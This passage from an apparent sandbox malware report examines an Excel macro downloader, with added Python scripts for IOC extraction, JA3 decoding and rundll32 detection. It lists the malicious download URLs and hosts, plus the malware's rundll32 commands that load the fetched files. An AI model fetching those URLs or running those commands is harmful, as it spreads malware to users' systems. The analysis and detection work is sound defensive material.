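The five plaintext sessions above share one pattern: the same file name (44250659496064800000.dat) is requested under a different random-looking directory from each of four hosts, every 200 OK answers with Content-Length: 0, and the one host that did not answer 200 redirects the client to the same path over HTTPS, which the report does not decrypt. The following script is an added example, not part of the Joe Sandbox report; it turns the HTTP and DNS sections into a machine-checkable IOC list and makes the "no payload over plaintext HTTP" observation explicit. The log text it parses is a constructed, simplified transcription of the sessions above (direction, request line, Host, status and Content-Length/Location only), and the DNS mapping is copied from the DNS Answers section.

```python
import re
from collections import defaultdict

# Constructed sample: the HTTP sessions above, reduced to the lines this
# script needs (direction + request line, Host, status line, Content-Length,
# Location). This is a transcription for the example, not raw sandbox output.
HTTP_LOG = """\
OUT GET /xklyulyijvn/44250659496064800000.dat HTTP/1.1
Host: rzminc.com
IN HTTP/1.1 200 OK
Content-Length: 0
OUT GET /eznwcdhx/44250659496064800000.dat HTTP/1.1
Host: pathinanchilearthmovers.com
IN HTTP/1.1 200 OK
Content-Length: 0
OUT GET /xjzpfwc/44250659496064800000.dat HTTP/1.1
Host: jugueterialatorre.com.ar
IN HTTP/1.1 301 Moved Permanently
Location: https://jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat
OUT GET /fdzgprclatqo/44250659496064800000.dat HTTP/1.1
Host: rzminc.com
IN HTTP/1.1 200 OK
Content-Length: 0
OUT GET /otmchxmxeg/44250659496064800000.dat HTTP/1.1
Host: biblicalisraeltours.com
IN HTTP/1.1 200 OK
Content-Length: 0
"""

# Host -> address, copied from the DNS Answers section of the report.
DNS_ANSWERS = {
    "rzminc.com": "72.52.227.180",
    "pathinanchilearthmovers.com": "162.241.80.6",
    "jugueterialatorre.com.ar": "138.36.237.100",
    "biblicalisraeltours.com": "68.66.216.42",
}

REQUEST_RE = re.compile(r"^OUT GET (\S+) HTTP/1\.[01]$")
STATUS_RE = re.compile(r"^IN HTTP/1\.[01] (\d{3})")


def parse_http_log(text):
    """Return one dict per request: path, host, status, length, location, url, ip."""
    requests = []
    cur = None
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            cur = {"path": m.group(1), "host": None, "status": None,
                   "length": None, "location": None}
            requests.append(cur)
            continue
        if cur is None:
            continue
        m = STATUS_RE.match(line)
        if m:
            cur["status"] = int(m.group(1))
        elif line.startswith("Host: "):
            cur["host"] = line[6:].strip()
        elif line.startswith("Content-Length: "):
            cur["length"] = int(line.split(":", 1)[1])
        elif line.startswith("Location: "):
            cur["location"] = line.split(":", 1)[1].strip()
    for r in requests:
        r["url"] = f"http://{r['host']}{r['path']}"
        r["ip"] = DNS_ANSWERS.get(r["host"])
    return requests


def summarize(requests):
    """Group requests by file name: which hosts served it, bytes actually
    delivered over plaintext HTTP, and where redirects pointed."""
    by_name = defaultdict(list)
    for r in requests:
        by_name[r["path"].rsplit("/", 1)[-1]].append(r)
    return {
        name: {
            "hosts": sorted({r["host"] for r in rs}),
            "delivered_bytes": sum(r["length"] or 0 for r in rs if r["status"] == 200),
            "redirects": [r["location"] for r in rs if r["location"]],
        }
        for name, rs in by_name.items()
    }


def iocs(requests):
    """Flat indicator lists suitable for blocking or hunting."""
    urls = {r["url"] for r in requests} | {r["location"] for r in requests if r["location"]}
    return {
        "urls": sorted(urls),
        "hosts": sorted({r["host"] for r in requests}),
        "ips": sorted({r["ip"] for r in requests if r["ip"]}),
    }


if __name__ == "__main__":
    reqs = parse_http_log(HTTP_LOG)
    for name, info in summarize(reqs).items():
        print(name, info)
    print(iocs(reqs))
```

The useful output is `delivered_bytes == 0` for the shared file name: none of the plaintext fetches returned content during the run, so any payload the Excel 4.0 macro obtained came over the HTTPS session to 138.36.237.100:443 (the redirect target), which is only visible in the TCP and HTTPS sections.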


                        HTTPS Packets

                        Timestamp | Source IP | Source Port | Dest IP | Dest Port
                        Feb 23, 2021 15:50:09.204065084 CET | 138.36.237.100 | 443 | 192.168.2.22 | 49168

                        Certificates presented by 138.36.237.100:443:
                        Subject: CN=jugueterialatorre.com.ar
                        Issuer: CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB
                        Not Before: Tue Jun 02 02:00:00 CEST 2020
                        Not After: Thu Jun 03 01:59:59 CEST 2021

                        Subject: CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US
                        Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                        Not Before: Mon Nov 06 13:23:33 CET 2017
                        Not After: Sat Nov 06 13:23:33 CET 2027

                        Note: the intermediate the server sent (RapidSSL RSA CA 2018) is not the issuer of the leaf (Sectigo RSA Domain Validation Secure Server CA). The two crt.sectigo.com lookups in the DNS section at 15:50:09 are consistent with the client fetching the missing issuer certificate itself, which is why the TLS handshake on port 49168 completes some seconds after the 301.

                        JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
                        JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b
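The JA3 fingerprint string is the raw material behind the "JA3 SSL client fingerprint seen in connection with other malware" signature, and it is worth being able to read it rather than only match the digest. The script below is an added example, not part of the Joe Sandbox report: it decodes the five JA3 fields (TLS version, cipher suites, extensions, supported groups, point formats) into IANA names, lists the legacy suites the client offered, and recomputes the digest the way JA3 defines it (MD5 over the comma-separated string). The fingerprint and digest are copied from the table above; the name tables are the IANA registry values for exactly the identifiers that appear in this fingerprint.

```python
import hashlib

# Copied from the HTTPS Packets table above.
JA3_STRING = ("771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-"
              "49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,"
              "0-10-11-13-23-65281,23-24,0")
REPORTED_DIGEST = "7dcce5b76c8b17472d024758970a406b"

TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2", 772: "TLS 1.3"}

# IANA cipher-suite names for the identifiers present in this fingerprint.
CIPHER_NAMES = {
    49192: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384",    # 0xC028
    49191: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256",    # 0xC027
    49172: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",       # 0xC014
    49171: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",       # 0xC013
    159: "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384",        # 0x009F
    158: "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256",        # 0x009E
    57: "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",            # 0x0039
    51: "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",            # 0x0033
    157: "TLS_RSA_WITH_AES_256_GCM_SHA384",            # 0x009D
    156: "TLS_RSA_WITH_AES_128_GCM_SHA256",            # 0x009C
    61: "TLS_RSA_WITH_AES_256_CBC_SHA256",             # 0x003D
    60: "TLS_RSA_WITH_AES_128_CBC_SHA256",             # 0x003C
    53: "TLS_RSA_WITH_AES_256_CBC_SHA",                # 0x0035
    47: "TLS_RSA_WITH_AES_128_CBC_SHA",                # 0x002F
    49196: "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",  # 0xC02C
    49195: "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",  # 0xC02B
    49188: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384",  # 0xC024
    49187: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256",  # 0xC023
    49162: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",     # 0xC00A
    49161: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",     # 0xC009
    106: "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256",        # 0x006A
    64: "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256",         # 0x0040
    56: "TLS_DHE_DSS_WITH_AES_256_CBC_SHA",            # 0x0038
    50: "TLS_DHE_DSS_WITH_AES_128_CBC_SHA",            # 0x0032
    10: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",               # 0x000A
    19: "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA",           # 0x0013
}
EXTENSION_NAMES = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
                   13: "signature_algorithms", 23: "extended_master_secret",
                   65281: "renegotiation_info"}
GROUP_NAMES = {23: "secp256r1", 24: "secp384r1"}


def _ints(field):
    """JA3 fields are dash-separated decimal integers; an empty field is an empty list."""
    return [int(x) for x in field.split("-")] if field else []


def decode_ja3(ja3_string):
    """Split the JA3 string into its five fields and label each identifier."""
    version, ciphers, exts, groups, formats = ja3_string.split(",")
    return {
        "version": TLS_VERSIONS.get(int(version), version),
        "ciphers": [(c, CIPHER_NAMES.get(c, "unknown")) for c in _ints(ciphers)],
        "extensions": [(e, EXTENSION_NAMES.get(e, "unknown")) for e in _ints(exts)],
        "groups": [(g, GROUP_NAMES.get(g, "unknown")) for g in _ints(groups)],
        "point_formats": _ints(formats),
    }


def legacy_indicators(decoded):
    """Offered suites a current client would not advertise: static-RSA key
    exchange (no forward secrecy) or 3DES."""
    return [name for _, name in decoded["ciphers"]
            if name.startswith("TLS_RSA_") or "3DES" in name]


def ja3_digest(ja3_string):
    """JA3 is defined as the MD5 hex digest of the fingerprint string."""
    return hashlib.md5(ja3_string.encode("ascii")).hexdigest()


if __name__ == "__main__":
    d = decode_ja3(JA3_STRING)
    print(d["version"], len(d["ciphers"]), "suites offered")
    for cid, name in d["ciphers"]:
        print(f"  0x{cid:04X} {name}")
    print("legacy:", legacy_indicators(d))
    print("digest matches report:", ja3_digest(JA3_STRING) == REPORTED_DIGEST)
```

The decoded ordering (ECDHE_RSA CBC suites first, no ECDHE_RSA GCM suites, 3DES and DHE_DSS at the tail, exactly six extensions) is a Schannel-style ClientHello, which fits the report's own finding that the download was issued by the Office process via URLDownloadToFile on a w7x64 system rather than by a browser; the JA3 signature fires because the same stack fingerprint is shared by many other Office-macro downloaders, not because it identifies this sample alone.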

                        System Behavior

                        General

                        Start time: 15:49:37
                        Start date: 23/02/2021
                        Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit): false
                        Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Imagebase: 0x13f380000
                        File size: 27641504 bytes
                        MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high

                        General

                        Start time: 15:49:50
                        Start date: 23/02/2021
                        Path: C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit): false
                        Commandline: rundll32 ..\JDFR.hdfgr,DllRegisterServer
                        Imagebase: 0xff8d0000
                        File size: 45568 bytes
                        MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high

                        General

                        Start time: 15:49:50
                        Start date: 23/02/2021
                        Path: C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit): false
                        Commandline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer
                        Imagebase: 0xff8d0000
                        File size: 45568 bytes
                        MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high

                        General

                        Start time: 15:49:51
                        Start date: 23/02/2021
                        Path: C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit): false
                        Commandline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer
                        Imagebase: 0xff8d0000
                        File size: 45568 bytes
                        MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high

                        General

                        Start time: 15:49:51
                        Start date: 23/02/2021
                        Path: C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit): false
                        Commandline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer
                        Imagebase: 0xff8d0000
                        File size: 45568 bytes
                        MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high

                        General

                        Start time: 15:49:52
                        Start date: 23/02/2021
                        Path: C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit): false
                        Commandline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer
                        Imagebase: 0xff8d0000
                        File size: 45568 bytes
                        MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high
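The process tree above is the part of this report most directly usable for detection: EXCEL.EXE, started with /automation -Embedding, launches rundll32 five times with a relative module path (..\JDFR.hdfgr, ..\JDFR.hdfgr1, ...), a non-.dll extension and the DllRegisterServer export, and it does so before the first HTTP request at 15:50:05, so the macro loops over candidate file names without waiting for a successful download. The script below is an added example, not part of the Joe Sandbox report and not the Sigma rule it references; it scores process-creation events for that combination. The events are constructed from the Startup section plus two benign controls, and the field names (pid, ppid, image, cmd) are an assumption standing in for whatever a Sysmon or EDR feed provides.

```python
import re
from pathlib import PureWindowsPath

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
                 "msaccess.exe", "mspub.exe"}

# Constructed process-creation events modelled on the Startup section above,
# plus two benign controls (explorer-launched rundll32 with a real DLL, and an
# Office-launched rundll32 pointing at a System32 DLL). Field names are an
# assumption for the example.
EVENTS = [
    {"pid": 1084, "ppid": 600,
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmd": r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"},
    {"pid": 2328, "ppid": 1084, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32 ..\JDFR.hdfgr,DllRegisterServer"},
    {"pid": 2524, "ppid": 1084, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32 ..\JDFR.hdfgr1,DllRegisterServer"},
    {"pid": 3000, "ppid": 700, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"pid": 3100, "ppid": 1084, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL"},
]

# rundll32 [path\]rundll32[.exe] <module>,<export> ...; the module may be quoted.
RUNDLL_ARGS = re.compile(
    r'^\s*\S*rundll32(?:\.exe)?\s+(?:"([^"]+)"|([^\s,]+)),(\w+)', re.IGNORECASE)


def parse_rundll32(cmd):
    """Return (module, export) from a rundll32 command line, or None."""
    m = RUNDLL_ARGS.match(cmd)
    if not m:
        return None
    return (m.group(1) or m.group(2)), m.group(3)


def detect(events):
    """Flag rundll32 children of Office processes and explain why."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if PureWindowsPath(e["image"]).name.lower() != "rundll32.exe":
            continue
        parsed = parse_rundll32(e["cmd"])
        if parsed is None:
            continue
        module, export = parsed
        parent = by_pid.get(e["ppid"])
        parent_name = PureWindowsPath(parent["image"]).name.lower() if parent else ""
        if parent_name not in OFFICE_IMAGES:
            continue  # scope: Office-spawned only; rundll32 elsewhere is too noisy
        reasons = [f"spawned by Office process {parent_name}"]
        mod = PureWindowsPath(module)
        if mod.suffix.lower() != ".dll":
            reasons.append(f"module has non-DLL extension {mod.suffix!r}")
        if not mod.is_absolute() and len(mod.parts) > 1:
            reasons.append("relative module path (resolved against the Office CWD)")
        if export.lower() == "dllregisterserver":
            reasons.append("DllRegisterServer export")
        findings.append({"pid": e["pid"], "module": module, "export": export,
                         "reasons": reasons,
                         "severity": "high" if len(reasons) >= 3 else "medium"})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["pid"], f["severity"], f["module"], f["export"], "; ".join(f["reasons"]))
```

Keying the rule on the parent being an Office binary keeps the base rate low; the extension and relative-path checks then separate this sample's pattern from the occasional legitimate Office add-in that registers itself through rundll32 with a real .dll, which the example still surfaces at medium severity rather than suppressing.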
